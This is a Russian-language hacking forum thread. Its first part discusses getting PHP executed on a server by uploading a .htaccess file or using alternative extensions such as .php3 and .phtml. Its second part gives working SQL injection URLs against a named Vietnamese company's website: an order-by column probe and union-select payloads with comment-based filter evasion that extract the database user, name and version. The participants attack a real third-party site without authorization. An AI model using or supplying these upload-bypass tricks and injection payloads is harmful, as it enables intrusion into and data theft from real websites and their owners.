Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...

30 % что зальёться .htaccess Т.к. если он уже php режет, это уже значит фильтрация.

// o_OPS Теория фильтрации fail. 30 %

И 95 % что сам .htaccess проканает. Т.к. не всегда .htaccess

Да и кто знает, мб там .htaccess лежит :O

Кстате DSU, IceAngel_ прав, если даже .htaccess в главной сказал мол jpg текст, то он в своей уже удаляет это правило, и создаёт новое.

Сомневаюсь. Можно пример такого .htaccess`а ?

З.Ы.
Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.

я думаю он имел ввиду, что может не хватить прав на перезапись хтаксеса, если он там уже лежит

С htaccess-ом конечно интересно, но если php.jpg загрузился, то значит фильтрация по расширению. Скорей всего фильтрация расширений по типу "разрешено все, что не запрещено". Попробуй пихнуть что-то типа php.222 и если прокатит, то пробуй все возможные расширения, которые интерпретируются как php. Например: .php3 .php .phtml .php4 .php5
Можете че и забыли в фильтре написать.

Привет группы;

Как мы можем получить таблицу с этого сайта, то посмотрим Запретный
http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20--
Вьетнамский сайте

И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет

'33' я получил от "order by"
http://www.hoanganjsc.com.vn/product.php?prodid=90%20order%20by%2034-- <-- Ошибка

мы можем придать таблице этого сайта, потому что сайт не показал какой-либо номер для инъекций?

всё он верно сделал. Просто там несколько запросов

http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--